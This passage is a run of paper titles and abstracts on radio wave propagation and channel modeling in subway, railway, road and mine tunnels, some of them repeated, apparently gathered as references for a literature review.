propagation and the train body greatly affects the natural propagation. Furthermore, the values of the path loss exponent are also given. --- paper_title: Measurement of Distributed Antenna Systems at 2.4 GHz in a Realistic Subway Tunnel Environment paper_content: Accurate characterization of the radio channel in tunnels is of great importance for new signaling and train control communications systems. To model this environment, measurements have been taken at 2.4 GHz in a real environment in Madrid subway. The measurements were carried out with four base station transmitters installed in a 2-km tunnel and using a mobile receiver installed on a standard train. First, with an optimum antenna configuration, all the propagation characteristics of a complex subway environment, including near shadowing, path loss, shadow fading, fast fading, level crossing rate (LCR), and average fade duration (AFD), have been measured and computed. Thereafter, comparisons of propagation characteristics in a double-track tunnel (9.8-m width) and a single-track tunnel (4.8-m width) have been made. Finally, all the measurement results have been shown in a complete table for accurate statistical modeling. --- paper_title: On the Possibility of Interpreting Field Variations and Polarization in Arched Tunnels Using a Model for Propagation in Rectangular or Circular Tunnels paper_content: We investigate the possibility of using the modal theory of the electromagnetic propagation in rectangular or circular tunnels, to satisfactorily interpret experimental results, including polarization, in arched tunnels. This study is based on extensive measurement campaigns carried out in the 450 MHz-5 GHz frequency range. --- paper_title: Analysis of radio wave propagation characteristics in rectangular road tunnel at 800 MHz and 2.4 GHz paper_content: We analyze radio wave propagation characteristics in tunnel using simulations by ray-tracing method and measurements for a newly constructed tunnel in Korea. As the simulation results using direct wave and 25 reflected waves and the measurement ones against the 14.7 meters wide, and 6.15 meters high, and 365 meters long tunnel is similar to each other, the radio wave propagation model for predicting received power in the tunnel can be applied to the other tunnels. --- paper_title: Enhancement of rectangular tunnel waveguide model paper_content: The ray theory is applied to locate the break point to distinguish propagation regions for line-of-sight topographies in rectangular tunnels. It is found that path loss in tunnels differs greatly in the regions prior to and after the break point. Nevertheless at least two waveguide modes are needed to accurately model tunnel natural propagation. In addition, the errors in the formulas to calculate the losses due to roughness and tilt of the tunnel walls are corrected. As a result, the propagation loss prediction of the rectangular tunnel waveguide model is significantly enhanced. --- paper_title: Research of propagation characteristics of break point: near zone and far zone under operational subway condition paper_content: This paper focuses on three vital aspects in propagation characteristics inside tunnels: break point; near zone and far zone in a practical environment. Firstly, all the distinguishing features of radio channel in the areas before and after break point at different angles such as modal theory, ray-tracing theory, statistics and propagation model have been summarized. By collectively analyzing the research perspectives above, a panoramic view on the propagation characteristics of break point; far zone and near zone has been proposed. Based on a measurement carried out in Madrid operational subway environment at 2.4 GHz, some new radio channel characters of the break point; the regions before and after break point at higher frequency have been discussed and analyzed. --- paper_title: Measurement of Distributed Antenna Systems at 2.4 GHz in a Realistic Subway Tunnel Environment paper_content: Accurate characterization of the radio channel in tunnels is of great importance for new signaling and train control communications systems. To model this environment, measurements have been taken at 2.4 GHz in a real environment in Madrid subway. The measurements were carried out with four base station transmitters installed in a 2-km tunnel and using a mobile receiver installed on a standard train. First, with an optimum antenna configuration, all the propagation characteristics of a complex subway environment, including near shadowing, path loss, shadow fading, fast fading, level crossing rate (LCR), and average fade duration (AFD), have been measured and computed. Thereafter, comparisons of propagation characteristics in a double-track tunnel (9.8-m width) and a single-track tunnel (4.8-m width) have been made. Finally, all the measurement results have been shown in a complete table for accurate statistical modeling. --- paper_title: Broadband Channel Long Delay Cluster Measurements and Analysis at 2.4GHz in Subway Tunnels paper_content: The delay caused by the reflected ray in broadband communication has a great influence on the communications in subway tunnel. This paper presents measurements taken in subway tunnels at 2.4 GHz, with 5 MHz bandwidth. According to propagation characteristics of tunnel, the measurements were carried out with a frequency domain channel sounding technique, in three typical scenarios: line of sight (LOS), Non-line-of-sight (NLOS) and far line of sight (FLOS), which lead to different delay distributions. Firstly IFFT was chosen to get channel impulse response (CIR) h(t) from measured three-dimensional transfer functions. Power delay profile (PDP) was investigated to give an overview of broadband channel model. Thereafter, a long delay caused by the obturation of tunnel is observed and investigated in all the scenarios. The measurements show that the reflection can be greatly remained by the tunnel, which leads to long delay cluster where the reflection, but direct ray, makes the main contribution for radio wave propagation. Four important parameters: distribution of whole PDP power, first peak arriving time, reflection cluster duration and PDP power distribution of reflection cluster were studied to give a detailed description of long delay characteristic in tunnel. This can be used to ensure high capacity communication in tunnels. --- paper_title: Measurement of Distributed Antenna Systems at 2.4 GHz in a Realistic Subway Tunnel Environment paper_content: Accurate characterization of the radio channel in tunnels is of great importance for new signaling and train control communications systems. To model this environment, measurements have been taken at 2.4 GHz in a real environment in Madrid subway. The measurements were carried out with four base station transmitters installed in a 2-km tunnel and using a mobile receiver installed on a standard train. First, with an optimum antenna configuration, all the propagation characteristics of a complex subway environment, including near shadowing, path loss, shadow fading, fast fading, level crossing rate (LCR), and average fade duration (AFD), have been measured and computed. Thereafter, comparisons of propagation characteristics in a double-track tunnel (9.8-m width) and a single-track tunnel (4.8-m width) have been made. Finally, all the measurement results have been shown in a complete table for accurate statistical modeling. --- paper_title: Modeling and measurement of wireless channels for underground mines paper_content: This paper investigates wireless channel modeling for underground mines. The ray tracing and modal methods, which have been widely used for modeling radio propagation in tunnels, are applied to model wireless channels in underground mines. In addition, propagation measurements are taken in an underground hard rock mine at three different frequencies (455 MHz, 915 MHz, and 2.45 GHz). Simulation results based on the ray tracing and modal methods are compared to measurement results and show agreement. Challenges for modeling wireless channels in mines are discussed. --- paper_title: Theoretical and experimental approach of the propagation of high frequency waves in road tunnels paper_content: Characterization of high frequency electromagnetic wave propagation in tunnels has important applications in the field of mobile communication. In long tunnels, the amplitude of the electric field radiated by a retransmitting antenna can be easily calculated from ray theory. However, for short tunnels, one of the most critical points is either the radiation towards free space of a mobile station emitting in the tunnel or, on the contrary, the penetration of an external wave inside the tunnel. This coupling between the inside and the outside is treated through the uniform theory of diffraction. By comparing theoretical and experimental results, it is shown that this theory leads to adequate prediction of the field variation and allows the authors to point out the influence of parameters, such as the position of the mobile in the tunnel and the influence of the angle of incidence, on the entrance plane of an incoming external wave. > --- paper_title: A ray-tracing method for predicting delay spread in tunnel environments paper_content: Our model to predict the propagation is based on ray-tracing which uses an images algorithm to find paths between transmitter and receiver of a digital communication system. It accounts for all rays reaching the receiver location after an arbitrary number of reflections and includes the effect of the angle of incidence, the material dielectric constant, the antenna pattern and polarization, the wall roughness, and the tunnel cross section size. The simulation results in this paper are obtained by analyzing many fewer rays compared to other published results. The results illustrate that in an empty straight rectangular tunnel environment, propagation has a very short time delay spread. Meanwhile, the results have shown that rms delay spread for horizontally polarized transmit and receive antennas is more than for vertically polarized transmit and receive antennas, in which the attenuation constant is less when transmit and receive antennas are horizontally polarized than when they are vertically polarized. Finally, by using a specific pattern, the rms delay spread is decreased compared to an isotropic antenna. --- paper_title: Experimental Characterization of an UWB Propagation Channel in Underground Mines paper_content: An experimental characterization of the ultrawideband (UWB) propagation channel in an underground mine environment over the frequency range from 3 GHz to 10 GHz is reported in this paper. Two kinds of antennas, directional and omnidirectional, were used to investigate the effect of the antenna directivity on the path loss propagation and on the time dispersion parameters in both line-of-sight (LOS) and no-line-of-sight (NLOS) underground galleries. The measurement and simulation results show that the path loss exponents in an underground environment are larger than their counterparts in an indoor environment. In NLOS, the directional-directional (Direct-Direct) antenna combination showed better radiation efficiency for reducing the time dispersion parameters while the omnidirectional-omni directional (Omni-Omni) case resulted better performance in term of path loss. After extracting the channel parameters, a statistical modeling of the UWB underground channel based on data measurements was conducted. --- paper_title: Effect of antenna on propagation characteristics of electromagnetic waves in tunnel environments paper_content: The optimal radiation pattern and optimal position of the source antenna installed inside a tunnel is the concern of this paper. By comparing theoretical and experimental results, it is shown that the field distribution of the electromagnetic wave in tunnel environments is sensitive to the position of the transmitting antenna in the cross section of a tunnel. And compared with the Omni-directional antenna, the utilization of the vertical antenna with radiation pattern of sinn θ on the upper middle of the wall, or the horizontal antenna with radiation pattern of sinn ϕ on the middle of the side wall, could represent significant improvement of the standing wave graphics, as well as the propagation attenuation. --- paper_title: Influence of Dimension Change on Radio Wave Propagation in Rectangular Tunnels paper_content: Based on the propagation modal and the software simulation method, characteristics of radio wave propagation in rectangular tunnels are studied from the view of the size shift of the tunnel width and height. The results show that the influence of the height change on the vertical polarization mode is greater than on the horizontal polarization mode; that of the width change on the vertical polarization mode is less than on the horizontal polarization mode. --- paper_title: Propagation in tunnels: experimental investigations and channel modeling in a wide frequency band for MIMO applications paper_content: The analysis of the electromagnetic field statistics in an arched tunnel is presented. The investigation is based on experimental data obtained during extensive measurement campaigns in a frequency band extending from 2.8GHz up to 5GHz and for a range varying between 50m and 500 m. Simple channel models that can be used for simulating MIMO links are also proposed. --- paper_title: Subway tunnel guided electromagnetic wave propagation at mobile communications frequencies paper_content: A measurement campaign has been carried out in the Berlin subway to characterize electromagnetic wave propagation in underground railroad tunnels. The received power levels at 945 and 1853.4 MHz are used to evaluate the attenuation and the fading characteristics in a curved arched-shaped tunnel. The measurements are compared to ray-optical modeling results, which are based on ray density normalization. It is shown that the geometry of a tunnel, especially the cross-sectional shape and the course, is of major impact on the propagation behavior and thus on the accuracy of the modeling, while the material parameters of the building materials have less impact. --- paper_title: Channel modeling and analysis for wireless networks in underground mines and road tunnels paper_content: Wireless networks can greatly facilitate the communication in underground mines and road/subway tunnels, where the propagation characteristics of electromagnetic (EM) waves are significantly different from those in terrestrial environments. According to the structure of underground mines and road tunnels, two types of channel models can be utilized, namely, tunnel and room/pillar channel models. However, there exists no theoretical model for room-and-pillar channel in underground mines to date, and current existing tunnel channel models do not provide an analytical solution for both near and far regions of the sources. In this paper, the multimode model is proposed, which provides an analytical expression for the received power and the power delay profile at any position in a tunnel.Moreover, the multimode model is extended to characterize the room-and-pillar channel in the underground mines after combining it with the shadow fading model. The theoretical models are validated by experimental measurements. Based on the proposed channel models, the effects of various factors on the signal propagation are analyzed. The factors include: the operating frequency, the size of the tunnel or underground mine room, the antenna position and polarization, and the electrical parameters. --- paper_title: Propagation Character of Electromagnetic Wave of the Different Transmitter Position in Mine Tunnel paper_content: In order to analysis the propagation character of electromagnetic wave in the limited space of mine tunnel when the wireless sensor is set in different position, the electric-field intensity and magnetic-field intensity of horizontal polarization wave are obtained according to Maxwell equation and boundary condition of tunnel. The electric-field attenuation coefficient of horizontal and vertical polarization wave are deduced through the traveling-wave condition of limited space. The attenuation characters of different position transmitter in rectangular mine tunnels are simulated in an experiment tunnel.The results shows the attenuation of electric-field intensity is increase quickly in 50m.When the transmitter is more close to the wall of the mine tunnel, the mode of propagation is more complex and the attenuation is more serious, whereas in the middle of the mine tunnel, the attenuation rate of radio is the least. It is benefit to evaluate the channel of wireless sensor network in mine tunnel. --- paper_title: Influence of Mine Tunnel Wall Humidity on Electromagnetic Waves Propagation paper_content: High moisture in mine tunnel can cause the change of the permittivity and conductivity of tunnel walls, therefore influence the characteristics of electromagnetic waves propagation. This paper analyzes the mechanism of humidity influencing the permittivity and conductivity and attenuation of electromagnetic waves propagation in the circular tunnel and rectangular tunnel. The study result shows that, in the interest frequency range, the change of permittivity caused by humidity has little effect on propagation attenuation, but the effect on the conductivity change cannot be ignored. When the humidity is greater than a certain value, the attenuation will be increased significantly. --- paper_title: Analysis of radio wave propagation characteristics in rectangular road tunnel at 800 MHz and 2.4 GHz paper_content: We analyze radio wave propagation characteristics in tunnel using simulations by ray-tracing method and measurements for a newly constructed tunnel in Korea. As the simulation results using direct wave and 25 reflected waves and the measurement ones against the 14.7 meters wide, and 6.15 meters high, and 365 meters long tunnel is similar to each other, the radio wave propagation model for predicting received power in the tunnel can be applied to the other tunnels. --- paper_title: Radio Wave Attenuation Character in the Confined Environments of Rectangular Mine Tunnel paper_content: The radio waves are more complex in confined environments such as coal mine tunnels, in order to obtain the propagation character of radio wave in the confined environments of mine tunnel, the electric-field intensity and magnetic-field intensity of horizontal polarization wave are obtained according to Maxwell equation and boundary condition of tunnel. The attenuation coefficients of electric field in horizontal and vertical polarization are deduced through the traveling wave condition of confined space. The attenuation characters of different position transmitter in rectangular mine tunnels are simulated in an experiment tunnel. The results shows the attenuation of electric-field intensity is increase quickly in 50m.When the transmitter is more close to the wall of the mine tunnel, the mode of propagation is more complex and the attenuation is more serious, whereas in the middle of the mine tunnel, the attenuation rate of radio is the least. Factors that influence the attenuation character of radio waves in mine tunnel are analysed and simulated too, it is benefit to evaluate the wireless channel quality in mine tunnel. --- paper_title: A Novel Wideband MIMO Car-to-Car Channel Model Based on a Geometrical Semi-Circular Tunnel Scattering Model paper_content: In this paper, we present a wideband multiple-input multiple-output (MIMO) car-to-car (C2C) channel model based on a geometrical semi-circular tunnel (SCT) scattering model. From the geometrical SCT scattering model, a reference channel model is derived under the assumption of single-bounce scattering in line-of-sight (LOS) and non-LOS (NLOS) propagation environments. In the proposed reference channel model, it is assumed that an infinite number of scatterers are randomly distributed on the tunnel wall. Starting from the geometrical scattering model, the time-variant transfer function (TVTF) is derived, and its correlation properties in time, frequency, and space are studied. Expressions are presented for the space–time–frequency cross-correlation function (STF-CCF), the two-dimensional (2D) space CCF, the 2D time–frequency CCF (TF-CCF), the temporal autocorrelation function (ACF), and the frequency correlation function (FCF). Owing to the semi-circular geometry, we reduced the originally threefold integrals to double integrals in the computations of the correlation functions, which simplifies the numerical analysis considerably. From the TVTF characterizing the reference model, an efficient sum-of-cisoid (SOC) channel simulator is derived. Numerical results show that both the temporal ACF and the FCF of the SOC channel simulator match very well with those of the reference model. A validation of the proposed model has been done by fitting the delay spread of the reference model to that of the measured channel, which demonstrates an excellent agreement. The proposed channel simulator allows us to evaluate the performance of C2C communication systems in tunnel environments. --- paper_title: Channel modeling of wireless communication in underground coal mines paper_content: Communication systems relying on wireless technology can significantly improve the safety and production in underground mines; however, their unreliable operation in such high-stress environments is a significant obstacle to achieving this. Underground mine tunnels offers several distinctive features that are quite different from regular rail/road tunnels. While several studies have been performed on electromagnetic (EM) wave propagation in tunnel environments, there is limited understanding of the inter-working of tunnel dimension with long range tilt variations (a typically feature of coal mines) on the propagation characteristics of wireless radio waves. In this paper, we present and describe a new hybrid multimode model for wireless communication in underground coal mines; and analyze it with respect to important parameters such as operating frequency, mine tunnel size, and transmitter-receiver position. The characterization results suggest that the mine tunnel size and transmitter-receiver position affects the signal behavior significantly. --- paper_title: Modeling for MIMO wireless channels in mine tunnels paper_content: The electromagnetic waves propagation situation is very complex in mine tunnels, so it is important to establish an efficient MIMO channel model for applying wireless communication technology to coal mine underground. A stochastic MIMO channel model is proposed firstly based on wireless propagation environment in mine tunnels, and then two spatial correlative channel models are established through correcting channel matrices based on abundant scatter environment. In this paper, the singular values and the channel capacity obtained with a Rayleigh channel model are compared, and system performance of different channel models are simulated. The simulation results indicate that established channel models are feasible by comparing with measurements results to mine tunnels. --- paper_title: Ray-optical modeling of simulcast radio propagation channels in tunnels paper_content: Simulcast radio propagation channel characteristics inside tunnels are considered in this paper. Based on the image theory of ray optics, a simulcast radio propagation channel in a rectangular tunnel is exactly formulated. As only the field components of horizontal and vertical polarization are of interest in real implementation, the exact formulation is approximated to facilitate the numerical computation. The calculated simulcast radio propagation channels are comparable fairly to measurements at 900 MHz and 2.0 GHz. The validated ray-optical modeling approach is then applied to simulate simulcast radio propagation channel characteristics at 900 MHz and 2.0 GHz to gain deeper insight and better understanding of this type of channels in tunnels. Results show that large fluctuations occur in the capture regions of the distributed antennas for both 900 MHz and 2.0 GHz. The fluctuations in the simulcast regions are larger at 2.0 GHz than at 900 MHz. The root-mean-squared (rms) delay spread is greater in the simulcast regions than in the capture regions of the distributed antennas. This larger delay spread is mainly due to the delay introduced by the transmission medium. Large values of the rms delay spread can be avoided by a careful design of the distance between the distributed antennas. --- paper_title: Tunnel and Non-Tunnel Channel Characterization for High-Speed-Train Scenarios in LTE-A Networks paper_content: In this contribution, a measurement campaign for high- speed-train (HST) channel is introduced where the down- link signals of in-service Long Time Evolution-Advanced (LTE-A) network deployed along the HST railway between Beijing to Shanghai are acquired. Channel impulse responses (CIRs) are extracted from received signals, and concatenated power delay profiles (CPDPs) are illustrated. According to the delay trajectories of the CPDPs, measurement scenarios are categorized into non- tunnel and tunnel scenarios. The delay spread and K- factor are investigated for both scenarios. The results show that the two scenarios have distinguishable statistics in delay spread and K-factor. --- paper_title: GBSB MODEL for MIMO Channel AND its Space-time CORRELATION Analysis in Tunnel paper_content: Aiming at the special space in the tunnel, this paper assumes the geometric distribution of scatterers which is totally different from on the ground, puts forward a new GBSB model of MIMO channel and deduces the space-time correlation function of the model. The results of theoretical analysis and simulation show that the model can more accurately reflect the factors which impact the channel correlation in the tunnel. --- paper_title: In-Tunnel Vehicular Radio Channel Characterization paper_content: Inside a tunnel, electromagnetic wave propagation differs strongly from the well understood "open-air" situation. The characterization of the tunnel environment is crucial for deploying vehicular communication systems. In this paper we evaluate vehicle-to-vehicle (V2V) radio channel measurements inside a tunnel. We estimate the time-varying root mean square (rms) delay and Doppler spreads, as well as the excess delay and the maximum Doppler dispersion. The fading process in V2V communications is inherently non-stationary. Hence, we characterize the stationarity time, for which we can consider the fading process to be wide sense stationary. We show that the spreads, excess delay, and maximum Doppler dispersion are larger on average when both vehicles are inside the tunnel compared to the "open-air" situation. The temporal evolution of the stationarity time is highly influenced by the strength of time-varying multipath components and the distance between vehicles. Furthermore, we show the good fit of the rms delay and Doppler spreads to a lognormal distribution, as well as for the stationarity time. From our analysis we can conclude that the IEEE 802.11p standard will be robust towards inter-symbol and inter-carrier interference inside a tunnel. --- paper_title: Measurements and Modeling of Distributed Antenna Systems in Railway Tunnels paper_content: This paper covers some of the work carried out in the planning of the global system for mobile communication for railway (GSM-R) of the tunnels on the new high-speed trains in Spain. Solutions based on distributed antenna systems have been tested by installing several 900-MHz transmitters inside and outside of a 4000-m tunnel and measuring the propagation in different conditions. The measurements have been used to model the effects of tunnel propagation, including curves, trains passing from the outside to the inside, and the effect of two trains passing inside the tunnel. All cases have been tested by comparing solutions using isofrequency and multifrequency distributed transmitters inside the tunnel. The improvements of signal-to-noise ratio and the reduction of the blocking effects of two trains passing have demonstrated the advantages of using isofrequency distributed antenna systems in tunnels. Finally, a complete propagation model combining both modal analysis and ray tracing has been applied to predict the propagation loss inside and outside these tunnels, and results have been compared with the measurements. The model has proven to be very useful for radio planning in new railway networks. --- paper_title: Investigation on MIMO channels in subway tunnels paper_content: The purpose of this paper is to examine the possibilities of increasing the channel capacity in tunnels, and particularly in railway tunnels, due to the use of multiple-input-multiple-output techniques. Many measurement campaigns have been carried out, considering the complicated geometric structure of these tunnels. We determine the channel characteristics by making a statistical analysis of correlation matrices between antennas and singular values of the channel transfer matrix. A comparison between the theoretical and experimental results is also presented. A stochastic channel model is then proposed and validated. --- paper_title: Measurement of Distributed Antenna Systems at 2.4 GHz in a Realistic Subway Tunnel Environment paper_content: Accurate characterization of the radio channel in tunnels is of great importance for new signaling and train control communications systems. To model this environment, measurements have been taken at 2.4 GHz in a real environment in Madrid subway. The measurements were carried out with four base station transmitters installed in a 2-km tunnel and using a mobile receiver installed on a standard train. First, with an optimum antenna configuration, all the propagation characteristics of a complex subway environment, including near shadowing, path loss, shadow fading, fast fading, level crossing rate (LCR), and average fade duration (AFD), have been measured and computed. Thereafter, comparisons of propagation characteristics in a double-track tunnel (9.8-m width) and a single-track tunnel (4.8-m width) have been made. Finally, all the measurement results have been shown in a complete table for accurate statistical modeling. --- paper_title: Modeling and Understanding MIMO propagation in Tunnels paper_content: This paper first presents an application of the modal theory for interpreting experimental results of the electromagnetic field variation along a tunnel. The transmitting frequency is assumed to be high enough so that the tunnel behaves as an oversized waveguide. Then, for a Multiple-Input Multiple-Output channel, theoretical results of the channel capacity are given. To explain the decrease of the capacity at large distance from the transmitter, even by assuming a constant signal to noise ratio, an approach based on the calculation of the eigenvalues of the transfer matrix in a reference scenario is described. --- paper_title: A Novel Wideband MIMO Car-to-Car Channel Model Based on a Geometrical Semi-Circular Tunnel Scattering Model paper_content: In this paper, we present a wideband multiple-input multiple-output (MIMO) car-to-car (C2C) channel model based on a geometrical semi-circular tunnel (SCT) scattering model. From the geometrical SCT scattering model, a reference channel model is derived under the assumption of single-bounce scattering in line-of-sight (LOS) and non-LOS (NLOS) propagation environments. In the proposed reference channel model, it is assumed that an infinite number of scatterers are randomly distributed on the tunnel wall. Starting from the geometrical scattering model, the time-variant transfer function (TVTF) is derived, and its correlation properties in time, frequency, and space are studied. Expressions are presented for the space–time–frequency cross-correlation function (STF-CCF), the two-dimensional (2D) space CCF, the 2D time–frequency CCF (TF-CCF), the temporal autocorrelation function (ACF), and the frequency correlation function (FCF). Owing to the semi-circular geometry, we reduced the originally threefold integrals to double integrals in the computations of the correlation functions, which simplifies the numerical analysis considerably. From the TVTF characterizing the reference model, an efficient sum-of-cisoid (SOC) channel simulator is derived. Numerical results show that both the temporal ACF and the FCF of the SOC channel simulator match very well with those of the reference model. A validation of the proposed model has been done by fitting the delay spread of the reference model to that of the measured channel, which demonstrates an excellent agreement. The proposed channel simulator allows us to evaluate the performance of C2C communication systems in tunnel environments. --- paper_title: Characterization of Angular Spread in Underground Tunnels Based on the Multimode Waveguide Model paper_content: One of the biggest challenges facing wireless designers is determining how to configure multiple-input–multiple-output (MIMO) antennas in underground-environments, such as mines, so that they deliver best performance. Here, we showed that angular dispersion of the signal, a phenomenon that greatly impacts channel capacity, can be accurately predicted in both near-field and far-field of underground tunnels using a multimode waveguide. Not only this analytical model is much faster than other methods, but also it does not have other shortcomings of measurement-based modeling (e.g., poor resolution for far distances in the tunnel). Further, we characterized angular-spread for different tunnel sizes and showed that the power-azimuth-spectrum can be modeled by a zero-mean Gaussian distribution whose standard-deviation (angular-spread) is dependent on the tunnel dimension and the transmitter-receiver distance. Angular-spread is found to be a decreasing function of axial distance. After a certain distance, it becomes very small (about 4 $^{\circ}$ ) and independent of tunnel transverse dimension. Our results are useful for design of MIMO systems in underground tunnels and sufficient to permit the correlation-matrix required to extend the IEEE 802.11n MIMO channel model to underground environments. --- paper_title: A calculation model and characteristics analysis of radio wave propagation in rectangular shed tunnel paper_content: Shed tunnel belongs to a kind of heterogeneous tunnel of open cut tunnel, which has been widely used in the railway as well as highway construction. Geometrical optics method is adopted in this paper to study and present a simulation of radio waves propagation in rectangular shed tunnels. By comparing the received power under different polarization modes, frequencies and permittivities, we get some relevant conclusions that the near-field region signal in shed tunnel fade soon, and the vertical polarization radio wave propagate in the shed tunnel is greatly influenced by environment. --- paper_title: A multi-mode waveguide tunnel channel model for high-speed train wireless communication systems paper_content: The recent development of high-speed trains (HSTs) introduce new challenges to wireless communication systems for HSTs. For demonstrating the feasibility of these systems, accurate channel models which can mimic key characteristics of HST wireless channels are essential. In this paper, we focus on HST channel models for the tunnel scenario, which is different from other HST channel environments, such as rural area and viaducts. Considering unique characteristics of tunnel channel environments, we extend the existing multi-mode waveguide tunnel channel model to be time dependent, obtain the channel impulse responses, and then further investigate certain key tunnel channel characteristics such as temporal autocorrelation function (ACF) and power spectrum density (PSD). The impact of time on ACFs and PSDs, and the impact of frequency on the received power are revealed via numerical results. --- paper_title: Research on Doppler spread of multipath channel in subway tunnel paper_content: Radio wave propagation in subway tunnel differs strongly from other circumstances because of the multi-path characteristics and special structure. A real multi-path propagation model for radio transmission in typical rectangular subway tunnel is presented in this paper, and ray-tracing technologies and wireless statistical theory are used to analyze Doppler spread and Doppler shift. Simulation results based on Wireless Insite show that Doppler spread and Doppler shift in tunnel are depended strongly upon frequency and velocity. Higher frequency signals and higher train's velocity exhibit larger Doppler spread and Doppler shift. The simulation results in this paper provide a reference for the application of 4G and 5G technologies used in metro system. --- paper_title: A Modified Method for Predicting the Radio Propagation Characteristics in Tunnels paper_content: Paths between transmitter and receiver could be determined based on geometric optics in straight rectangular tunnels. Later on, the united theory of diffraction is used to calculate receiving power. This method could also be applied to other tunnels with different cross section. From the results of simulation and theory, this method has the same exactness as dedicated software, as well as lower complexity of computing. --- paper_title: A Study on Channel Modeling in Tunnel Scenario Based on Propagation-Graph Theory paper_content: A new approach based on conventional propagation graph channel modeling was proposed to haracterize the wireless channel in non-light of sight (NLOS) tunnel scenarios. The scattering points are regarded as several points sets, which are different from the propagation-graph theory, then the transfer probability among sets is introduced to adjust the channel impulse response (CIR) taps. The advantage of the proposed method is that wideband channel coefficients, CIR in delay, antennas' correlation coefficient, angle of arrival (AOA), angle of departure (AOD), channel capacity can be calculated analytically for these environments. The validation of the proposed method is performed by the reasonable distribution of the CIR taps, AOD and AOA. Finally some works are done to investigate the variation of tunnel channel coefficients when tunnel bending angle varies, and channel matrix degradation is adopted to explain it. --- paper_title: Graph Theoretic Models and Tools for the Analysis of Dynamic Wireless Multihop Networks paper_content: Wireless multihop networks are being increasingly used in military and civilian applications. Advanced applications of wireless multihop networks demand better understanding on their properties. Existing research on wireless multihop networks has largely focused on static networks, where the network topology is time-invariant; and there is comparatively a lack of understanding on the properties of dynamic networks with dynamically changing topology. In this paper, we use and extend a recently proposed graph theoretic model, i.e. evolving graphs, to capture the characteristics of such networks. We extend and develop the concepts of route matrix, connectivity matrix and probabilistic connectivity matrix as convenient tools to characterize and investigate the properties of evolving graphs and the associated dynamic networks. The properties of these matrices are established and their relevance to the properties of dynamic wireless multihop networks are introduced. --- paper_title: WINNER model for subway tunnel at 5.8 GHz paper_content: Modern subways operation relies on wireless systems based on IEEE802.11x modems deployed inside tunnels. Constraints on robustness and needs for high data rates led to the use of MIMO techniques. In order to evaluate performance of MIMO systems in dynamic configurations with moving trains, it is mandatory to develop adequate dynamic channel model. In this paper, the authors present a new WINNER based model for a subway tunnel at 5.8 GHz in a representative geometric configuration with two tracks and two crossing trains and a 4×4 MIMO system. The statistical behavior of the key parameters of the new WINNER scenario are derived from the complex impulse responses obtained with a 3D ray tracing simulator and given in this paper. Five clusters are considered. The total received power and the 4×4 MIMO channel capacity are compared with the ones derived from the 3D ray tracing simulator. --- paper_title: Physics-based ultra-wideband channel modeling for tunnel/mining environments paper_content: Understanding wireless channels in mining environments is critical for designing optimized wireless systems in these complex environments. In this paper, we propose a physics-based deterministic UWB channel model for characterizing wireless channels in mining/tunnel environments. Both the time domain Channel Impulse Response (CIR) and frequency domain channel transfer function for tunnel environments are derived in an analytical form. The derived CIR and transfer function are validated by RF measurements at different frequencies. --- paper_title: Computational Electrodynamics the Finite-Difference Time-Domain Method paper_content: Part 1 Reinventing electromagnetics: background history of space-grid time-domain techniques for Maxwell's equations scaling to very large problem sizes defense applications dual-use electromagnetics technology. Part 2 The one-dimensional scalar wave equation: propagating wave solutions finite-difference approximation of the scalar wave equation dispersion relations for the one-dimensional wave equation numerical group velocity numerical stability. Part 3 Introduction to Maxwell's equations and the Yee algorithm: Maxwell's equations in three dimensions reduction to two dimensions equivalence to the wave equation in one dimension. Part 4 Numerical stability: TM mode time eigenvalue problem space eigenvalue problem extension to the full three-dimensional Yee algorithm. Part 5 Numerical dispersion: comparison with the ideal dispersion case reduction to the ideal dispersion case for special grid conditions dispersion-optimized basic Yee algorithm dispersion-optimized Yee algorithm with fourth-order accurate spatial differences. Part 6 Incident wave source conditions for free space and waveguides: requirements for the plane wave source condition the hard source total-field/scattered field formulation pure scattered field formulation choice of incident plane wave formulation. Part 7 Absorbing boundary conditions for free space and waveguides: Bayliss-Turkel scattered-wave annihilating operators Engquist-Majda one-way wave equations Higdon operator Liao extrapolation Mei-Fang superabsorption Berenger perfectly-matched layer (PML) absorbing boundary conditions for waveguides. Part 8 Near-to-far field transformation: obtaining phasor quantities via discrete fourier transformation surface equivalence theorem extension to three dimensions phasor domain. Part 9 Dispersive, nonlinear, and gain materials: linear isotropic case recursive convolution method linear gyrontropic case linear isotropic case auxiliary differential equation method, Lorentz gain media. Part 10 Local subcell models of the fine geometrical features: basis of contour-path FD-TD modelling the simplest contour-path subcell models the thin wire conformal modelling of curved surfaces the thin material sheet relativistic motion of PEC boundaries. Part 11 Explicit time-domain solution of Maxwell's equations using non-orthogonal and unstructured grids, Stephen Gedney and Faiza Lansing: nonuniform, orthogonal grids globally orthogonal global curvilinear co-ordinates irregular non-orthogonal unstructured grids analysis of printed circuit devices using the planar generalized Yee algorithm. Part 12 The body of revolution FD-TD algorithm, Thomas Jurgens and Gregory Saewert: field expansion difference equations for on-axis cells numerical stability PML absorbing boundary condition. Part 13 Modelling of electromagnetic fields in high-speed electronic circuits, Piket-May and Taflove. (part contents). --- paper_title: GBSB MODEL for MIMO Channel AND its Space-time CORRELATION Analysis in Tunnel paper_content: Aiming at the special space in the tunnel, this paper assumes the geometric distribution of scatterers which is totally different from on the ground, puts forward a new GBSB model of MIMO channel and deduces the space-time correlation function of the model. The results of theoretical analysis and simulation show that the model can more accurately reflect the factors which impact the channel correlation in the tunnel. --- paper_title: Theory of the propagation of UHF radio waves in coal mine tunnels paper_content: The theoretical study of UHF radio communication in coal mines, with particular reference to the rate of loss of signal strength along a tunnel, and from one tunnel to another around a corner is the concern of this paper. Of prime interest are the nature of the propagation mechanism and the prediction of the radio frequency that propagates with the smallest loss. The theoretical results are compared with published measurements. This work was part of an investigation of new ways to reach and extend two-way communications to the key individuals who are highly mobile within the sections and haulageways of coal mines. --- paper_title: Energy efficiency of small cell backhaul networks based on Gauss–Markov mobile models paper_content: To satisfy the recent growth of mobile data usage, small cells are recommended to deploy into conventional cellular networks. However, the massive backhaul traffic is a troublesome problem for small cell networks, especial in wireless backhaul transmission links. In this study, backhaul traffic models are first presented considering the Gauss–Markov mobile models of mobile stations in small cell networks. Furthermore, an energy efficiency model of small cell backhaul networks with Gauss–Markov mobile models has been proposed. Numerical results indicate that the energy efficiency of small cell backhaul networks can be optimised by trade-off the number and radius of small cells in cellular networks. --- paper_title: A Hybrid Ray-Tracing/Vector Parabolic Equation Method for Propagation Modeling in Train Communication Channels paper_content: In recent years, various techniques have been applied to modeling radio-wave propagation in railway networks, each one presenting its own advantages and limitations. This paper presents a hybrid channel modeling technique, which combines two of these methods, the ray-tracing (RT) and vector parabolic equation (VPE) methods, to enable the modeling of realistic railway scenarios including stations and 